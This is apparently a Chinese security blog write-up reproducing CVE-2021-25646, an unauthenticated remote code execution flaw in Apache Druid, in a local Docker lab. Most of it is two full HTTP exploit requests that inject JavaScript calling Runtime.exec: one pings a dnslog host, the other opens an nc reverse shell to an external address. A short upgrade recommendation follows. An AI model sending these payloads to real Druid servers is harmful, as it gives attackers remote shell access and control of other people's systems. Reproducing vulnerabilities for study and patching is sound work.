Apache Druid 远程代码执行 CVE-2021-25646 漏洞复现

Apache Druid 远程代码执行 CVE-2021-25646 漏洞复现

前言

Apache Druid 是用Java编写的面向列的开源分布式数据存储，旨在快速获取大量事件数据，并在数据之上提供低延迟查询。

由于Apache Druid 默认情况下缺乏授权认证，攻击者可直接构造恶意请求执行任意代码，控制服务器，风险极大

影响版本

Apache Druid < 0.20.1

环境搭建

这里本地用Docker搭建

下载链接：https://github.com/apache/druid/archive/druid-0.20.0.zip

解压后执行：

cd druid-druid-0.20.0/distribution/docker
docker-compose up -d

类似于vulhub得靶场一样，就直接搭好了，访问8888端口就是web界面。

看网上也有用 fokkodriesprong/docker-druid的镜像，应该也是可以的

docker pull fokkodriesprong/docker-druid
docker run --rm -i -p 8888:8888 fokkodriesprong/docker-druid

漏洞复现

这里有个点，就是poc中请求头的uri是对应的哪个功能点。这里我们找一下。

访问8888端口进入首页后点击Load data —> Local disk —> Connect data

右侧 base directory 填入：

quickstart/tutorial/

file filter填入：

wikiticker-2015-09-12-sampled.json.gz

点击apply，接下来一路next，直到下一步是Filter时进行抓包，就抓到了poc中uri对应的数据包了，后面只需改掉data部分即可RCE。

0x01 dnslog测试

尝试了几次总会出问题，一个是注意docker搭建完后确认容器是否都启动了，再有根据自己抓的包改掉POST得data部分即可。

POST /druid/indexer/v1/sampler HTTP/1.1

Host: 192.168.124.153:8888

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0

Accept: application/json, text/plain, */*

Accept-Language: zh,en-US;q=0.7,en;q=0.3

Accept-Encoding: gzip, deflate

Referer: http://192.168.124.153:8888/unified-console.html

Content-Type: application/json;charset=utf-8

Content-Length: 993

Connection: close

{"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{\"isRobot\":true,\"channel\":\"#x\",\"timestamp\":\"2021-2-1T14:12:24.050Z\",\"flags\":\"x\",\"isUnpatrolled\":false,\"page\":\"1\",\"diffUrl\":\"https://xxx.com\",\"added\":1,\"comment\":\"Botskapande Indonesien omdirigering\",\"commentLength\":35,\"isNew\":true,\"isMinor\":false,\"delta\":31,\"isAnonymous\":true,\"user\":\"Lsjbot\",\"deltaBucket\":0,\"deleted\":0,\"namespace\":\"Main\"}"}, "inputFormat": {"type": "json", "keepNullColumns": true}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec('ping yd7wk0.dnslog.cn')}", "": {"enabled": true}}}}, "type": "index", "tuningConfig": {"type": "index"}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}

0x02 反弹shell

这里是利用nc反弹的

POST /druid/indexer/v1/sampler HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json
Content-Length: 1008
Connection: close

{"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{\"isRobot\":true,\"channel\":\"#x\",\"timestamp\":\"2021-2-1T14:12:24.050Z\",\"flags\":\"x\",\"isUnpatrolled\":false,\"page\":\"1\",\"diffUrl\":\"https://xxx.com\",\"added\":1,\"comment\":\"Botskapande Indonesien omdirigering\",\"commentLength\":35,\"isNew\":true,\"isMinor\":false,\"delta\":31,\"isAnonymous\":true,\"user\":\"Lsjbot\",\"deltaBucket\":0,\"deleted\":0,\"namespace\":\"Main\"}"}, "inputFormat": {"type": "json", "keepNullColumns": true}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec(' nc xxx.xxx.xxx.xxx 9999 -e /bin/sh')}", "": {"enabled": true}}}}, "type": "index", "tuningConfig": {"type": "index"}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}

修复建议

升级Apache Druid至 0.20.1版本

https://druid.apache.org/downloads.html

Reference

https://www.cnblogs.com/cHr1s/p/14365418.html

https://www.adminxe.com/2109.html